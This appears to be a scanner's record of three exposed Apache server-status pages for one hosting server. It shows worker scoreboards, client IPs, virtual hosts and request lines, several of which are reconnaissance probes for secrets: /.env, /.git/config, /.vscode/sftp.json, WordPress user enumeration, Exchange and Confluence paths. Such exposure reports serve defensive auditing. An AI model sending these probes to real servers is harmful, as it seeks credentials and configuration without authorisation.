0/0/0/0/0 (open/recv/resp/push/rst) 1-66623855070/73/46564_ 7.5010664272635630.02.821085.34 108.162.237.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-66623855070/125/43834_ 7.6510214826310.01.42972.63 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-66623855060/68/34786_ 6.80291127195388920.01.24779.02 188.166.108.93http/1.1 2-66623855060/65/36426_ 6.8330218208452870.00.94850.60 172.64.238.118h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-66623855060/60/36939_ 6.87101240186935680.01.49773.81 172.70.255.151h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-66623855060/62/35818_ 6.91290239643130.01.012230.08 188.166.108.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-66623855060/48/35934_ 6.912921179513540.00.98891.17 188.166.108.93http/1.1 2-66623855060/73/35796W 6.9400274964200.01.10813.95 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-66623855060/63/35497_ 6.87101385180868730.00.622211.44 172.70.255.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-66623855060/60/35951_ 6.98301187582310.01.99853.60 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-66623855060/61/36157_ 6.6829117206409680.02.52781.64 188.166.108.93http/1.1 2-66623855060/57/35602_ 6.85292253182350.01.03791.01 188.166.108.93http/1.1 3-66623855080/8/40096_ 3.47290211896960.00.071024.42 188.166.108.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-66623855080/5/38680_ 3.2779551191416240.00.01987.62 77.221.149.180http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/9/40220_ 3.527900235461630.00.08910.16 172.64.238.129h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/6/39945_ 3.847890341188640.00.04939.96 172.71.166.233h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/7/39619_ 3.53795267219224230.00.02862.17 172.71.150.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/9/40307_ 3.467890212044590.00.69966.01 172.68.26.182h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/7/39160_ 3.847950239605990.00.321036.01 172.71.166.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/9/38821_ 4.1400249523500.00.02841.51 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-66623855080/9/38762_ 3.527930240235530.00.10834.89 172.64.238.158h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/4/39805_ 3.777930198916980.00.17930.89 172.64.238.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/6/41004_ 4.092511247756070.00.751046.65 172.64.238.113h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/7/40381_ 3.5415800200135950.00.022369.77 172.71.186.135h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/9/39183_ 3.472460196925170.00.29898.64 172.70.57.142h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/7/39733_ 3.48280300680070.00.47853.06 188.166.108.93http/1.1 4-66623855050/10/39387_ 3.472460247200100.00.321001.84 172.70.57.244h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/6/38746_ 4.2010206852240.00.05886.89 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-666
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e34ce5024d
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 21-Mar-2024 13:34:50 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 474 Parent Server MPM Generation: 473 Server uptime: 50 days 2 hours 51 minutes 51 seconds Server load: 0.64 0.40 0.21 Total accesses: 1477727 - Total Traffic: 38.7 GB - Total Duration: 805283089 CPU Usage: u223.28 s241.14 cu7389.48 cs5355.18 - .305% CPU load .341 requests/sec - 9.4 kB/second - 27.5 kB/request - 544.947 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01265364no1yes19000 11265497no2yes010001 21265363no0yes010000 31265366no2yes010001 41265365no0yes010000 Sum505 149002 ____W_____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-47312653640/749/28329_ 42.8100114515830.09.24653.38 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-47312653640/737/28351_ 42.8010154358610.011.26636.18 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-47312653640/924/28500_ 42.646704179973990.012.64718.16 128.199.182.77h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-47312653640/843/27842_ 42.726392150160550.010.58643.74 128.199.182.77h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-47312653640/792/27638W 42.7800115374620.011.77631.24 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-47312653640/942/27706_ 42.77027106203240.022.02588.92 172.71.131.36h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/978/27552_ 42.761349123268290.012.14534.82 79.155.252.122h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/771/27665_ 42.8020234533390.020.73614.12 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-47312653640/810/28397_ 42.7713544156123700.022.70593.14 172.71.246.109h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/1049/29109_ 42.70049893171620.013.292039.56 172.70.57.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/939/32328_ 42.5330124381360.014.72699.89 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-47312654970/617/32156_ 42.405419192872170.09.49675.90 128.199.182.77http/1.1 1-47312654970/944/31881_ 42.490442168780190.013.77680.07 172.70.57.164h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 1-47312654970/718/31377_ 42.481509153174760.010.50732.05 172.70.57.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/1143/32155_ 42.514393306825380.016.88678.72 128.199.182.77http/1.1 1-47312654970/1027/30258_ 42.506427238737580.014.93800.57 128.199.182.77http/1.1 1-47312654970/1058/31698_ 42.5110140645670.016.67786.82 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-47312654970/756/31916_ 42.505487186495940.013.47617.50 128.199.182.77h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-47312654970/937/34234_ 42.516408187846360.013.74788.24 172.70.57.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/958/30789_ 42.45526138150110.014.52676.75 128.199.182.77http/1.1 2-47312653630/144/24652_ 20.33640141666630.02.29542.83 162.158.154.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/209/26201_ 20.6930145552040.02.01624.14 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-47312653630/140/26659_ 19.814310142880540.01.50581.59 91.204.127.221http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/165/25757_ 20.6669292185746230.03.332029.28 172.71.135.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/196/26605_ 20.406453122511400.02.49679.93 79.155.252.122h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-47312653630/196/25932_ 20.1123538151567680.04.17606.02 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/132/25826_ 20.482350122829760.04.001979.45 172.70.181.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/128/26279_ 20.483485424600.02.50669.66 172.70.181.135h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/137/26984_ 20.3370135054260.04.04612.26 128.199.182.77h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-47312653630/141/25329_ 20.59240995128990420.01.79584.21 172.71.218.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/448/30492_ 25.676611148218000.05.57742.06 172.70.57.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/228/29675_ 25.481360151922910.06.00778.04 172.71.151.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/288/30836_ 25.49135158184036270.03.10668.35 88.84.90.34h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/288/30469_ 25.6710223254300.03.93727.74 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-47312653660/450/30340_ 25.452385164839990.018.29680.44 172.70.181.132h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-47312653660/409/30613_ 25.4510161880150.05.35719.22 172.70.181.135h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/346/29988_ 25.4510157841010.03.09793.07 172.70.181.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/278/29559_ 25.56150157823050.02.59633.50 2.139.173.78h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/263/28670_ 25.4641174362290.04.38631.34 128.199.182.77h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-47312653660/357/29595_ 25.61141532163025170.05.96748.99 172.69.71.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/131/32276_ 20.28141510212093170.03.65831.17 172.71.30.217h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/117/32535_ 20.093460155706210.01.802159.37 172.70.181.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/112/31514_ 20.103460157573960.015.41710.50 172.70.181.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/104/31660_ 20.16136417153285110.01.16627.24 172.68.134.135h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/119/31503_ 20.3620203083200.02.39780.25 128.199.182.77http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-47312653650/249/30551_ 20.1040
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e36581d5c3
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 08-Mar-2024 10:07:00 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 36 days 23 hours 24 minutes 1 second Server load: 0.14 0.17 0.09 Total accesses: 1034519 - Total Traffic: 30.6 GB - Total Duration: 588406818 CPU Usage: u138.55 s167.51 cu5361.41 cs3916.14 - .3% CPU load .324 requests/sec - 10.0 kB/second - 31.0 kB/request - 568.773 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0550439no0yes010000 1550442no1yes010000 2550575no1yes19000 3550440no0yes010000 4550441no0yes010000 Sum502 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3335504390/57/19182_ 11.701574987477110.00.88499.76 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/21/18812_ 12.0210113662860.00.16463.71 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-3335504390/22/18918_ 11.94165432143035460.00.12540.14 172.64.238.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/19/18706_ 10.5110106950060.00.82457.41 165.227.80.196http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/18/18825_ 11.75156083860240.00.16497.64 172.68.200.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/24/18354_ 11.9416549783442020.00.63439.57 172.64.238.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/24/18480_ 11.92160095744840.00.45378.54 172.64.238.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/33/18275_ 11.7016059207290690.01.13441.48 2.136.78.3h2relehse.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-3335504390/24/19230_ 11.7416010130655460.00.54438.98 172.68.200.147h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/25/19350_ 11.9516253362977680.00.391875.33 172.71.151.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/227/20433_ 21.08426190938430.02.95498.64 195.2.78.230http/1.1 1-3335504420/220/20408_ 21.381239139721990.02.75476.03 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/433/19902_ 21.351296371844020.04.86475.29 172.64.236.44h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/336/20403_ 21.364388798579320.03.37551.23 172.64.236.44h2tandemsl.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 1-3335504420/512/20007_ 21.4123977194331730.05.43497.97 141.101.98.138h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3335504420/460/19048_ 21.42171057205140490.04.05548.51 141.101.98.138h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/550/20604_ 21.3718199103511040.04.42590.30 141.101.98.233h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3335504420/271/20577_ 21.31420141296410.03.00420.87 195.2.78.230http/1.1pre.relehse.com:80done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-3335504420/363/21389_ 21.381865146183690.04.33578.84 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/365/20265_ 21.3929910108628480.04.63476.06 141.101.98.138h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/100/18273_ 15.0020124835490.00.95405.66 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3335505750/189/19822_ 14.95234103889610.01.62507.25 167.99.181.249h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3335505750/265/19998_ 15.0010122373470.03.37496.58 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-3335505750/131/19686_ 14.933224123445710.01.251870.28 167.99.181.249http/1.1 2-3335505750/168/19701_ 15.0020104671900.01.66540.62 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3335505750/115/19239W 14.8500131204740.01.19478.49 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3335505750/195/19109_ 15.0010102342940.01.771861.79 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3335505750/120/19379_ 14.8833464975160.01.44539.25 167.99.181.249h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3335505750/105/19453_ 14.9131114858400.01.69473.97 167.99.181.249http/1.1 2-3335505750/101/18893_ 15.002622109750220.01.18465.47 172.64.238.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/154/21771_ 17.09134598804640.01.40583.62 172.68.134.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/197/21424_ 16.941896089359880.02.03615.84 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/147/22417_ 16.96420132703300.02.87497.82 172.64.236.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/290/21578_ 16.77422137110070.03.90522.37 172.68.200.154h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/241/21812_ 17.0641952109007210.02.46451.74 141.101.98.139h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/350/21781_ 16.64364593386730.02.84573.28 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/218/21120_ 16.9518941114951540.02.33580.16 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3335504400/167/21120_ 16.973693194438200.02.72490.89 172.70.85.248h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/146/20544_ 17.090097343610.02.04461.42 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3335504400/159/20912_ 17.054734114508720.03.85597.48 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/20/24003_ 11.29044161881220.00.27647.34 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/32/23979_ 11.231630122606300.01.172017.58 172.68.200.148h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-3335504410/15/23136_ 11.311932063127611410.00.33549.65 172.69.195.2h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/63/24070_ 9.71164087330580.00.50485.16 192.185.179.132h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/20/23039_ 11.2919352150983580.00.23563.81 2.136.78.3h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-3335504410/11/22644_ 11.461600134670250.01.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e310c69587
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 07-Mar-2024 13:43:37 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 333 Parent Server MPM Generation: 332 Server uptime: 36 days 3 hours 38 seconds Server load: 0.22 0.15 0.15 Total accesses: 1010787 - Total Traffic: 30.1 GB - Total Duration: 574050963 CPU Usage: u93.05 s130.36 cu5265.04 cs3844.99 - .299% CPU load .324 requests/sec - 10.1 kB/second - 31.3 kB/request - 567.925 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0521405no1yes010000 1521408no1yes010000 2521538no1yes19000 3521406no0yes010000 4521407no1yes010000 Sum504 149000 ______________________W___________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3325214050/0/18906_ 0.00435786185910.00.00494.65 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3325214050/1/18594_ 0.0010112321110.00.00460.04 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3325214050/0/18683_ 0.004343141262890.00.00537.18 2.136.78.3h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-3325214050/0/18477_ 0.0010105638140.00.00453.02 2.136.78.3h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-3325214050/1/18596_ 0.010081843550.00.00494.46 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3325214050/1/18097_ 0.010081726440.00.00437.06 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-3325214050/0/18245_ 0.00435773490180.00.00365.27 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3325214050/1/18027_ 0.0100205164320.00.00437.67 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-3325214050/1/18989_ 0.0100129103590.00.00435.82 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 0-3325214050/0/19127_ 0.000061553720.00.001871.33 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/4/19671_ 0.070088146240.00.01487.63 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-3325214080/5/19501_ 0.0800137489190.00.07451.17 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 1-3325214080/4/18827_ 0.080066338120.00.08458.51 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-3325214080/2/19428_ 0.04020896500430.00.00539.07 138.68.133.118http/1.1 1-3325214080/2/19094_ 0.050274162496110.00.00487.72 138.68.133.118http/1.1 1-3325214080/3/18119_ 0.061241202972980.00.00536.97 172.71.103.133h2lcftech.es:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 1-3325214080/4/19604_ 0.0800101286150.00.01564.31 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-3325214080/2/19855_ 0.050231139049600.00.00407.45 172.71.103.133h2lcftech.es:443done, streams: 0/24/24/0/0 (open/recv/resp/push/rst) 1-3325214080/4/20486_ 0.0710143905930.00.00566.09 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-3325214080/3/19443_ 0.0800106584580.00.02463.44 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3325215380/2/17654_ 0.0300122899950.00.00397.56 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3325215380/0/19263_ 0.0000101718910.00.00499.30 2.136.78.3h2relehse.com:443idle, streams: 0/80/80/0/0 (open/recv/resp/push/rst) 2-3325215380/0/19194W 0.0000119742590.00.00481.53 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3325215380/1/19211_ 0.011529122043770.00.001862.06 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/1/19174_ 0.01127102674890.00.01519.72 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3325215380/1/18667_ 0.0300129081920.00.00442.85 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3325215380/0/18541_ 0.000099892580.00.001854.61 138.68.133.118http/1.1 2-3325215380/2/18839_ 0.030062957220.00.00531.37 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-3325215380/0/18911_ 0.0002112864280.00.00464.54 138.68.133.118http/1.1 2-3325215380/1/18253_ 0.0300107754820.00.00455.08 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 3-3325214060/3/21425_ 0.020097184650.00.01578.60 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-3325214060/1/21026_ 0.020087702120.00.00598.76 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3325214060/0/22007_ 0.0000131151230.00.00491.53 18.190.176.117http/1.1relehse.com:80GET /.well-known/acme-challenge/zX1scPYstfZ2nx2lGNkY76grjNl-Ifn 3-3325214060/0/21101_ 0.0002135256520.00.00515.48 163.116.184.117http/1.1relehse.com:443GET /admin_layout/plugins/select2/select2.min.js HTTP/1.1 3-3325214060/1/21313_ 0.0200107570250.00.00447.25 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 3-3325214060/1/21247_ 0.020091875950.00.00565.75 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-3325214060/1/20717_ 0.0300113151970.00.00574.07 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3325214060/1/20773_ 0.020093127320.00.00473.87 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3325214060/0/20204_ 0.000095615250.00.00457.07 54.201.84.252http/1.1relehse.com:80GET /.well-known/acme-challenge/zX1scPYstfZ2nx2lGNkY76grjNl-Ifn 3-3325214060/0/20531_ 0.0006113197140.00.00576.84 138.68.133.118http/1.1 4-3325214070/1/23800_ 0.0110160369260.00.00643.74 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-3325214070/0/23694_ 0.0010120840420.00.002013.57 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3325214070/0/22817_ 0.00126126457080.00.00542.66 172.70.174.221h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3325214070/1/23769_ 0.020085826840.00.00480.97 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-3325214070/0/22819_ 0.0000149482080.00.00558.98 35.88.72.230http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/ANslCMtoFu_I3MQfH3ioZTdOqY0s0jM 4-3325214070/1/22445_ 0.0201133164170.00.00498.44 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-33
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e38e0793de
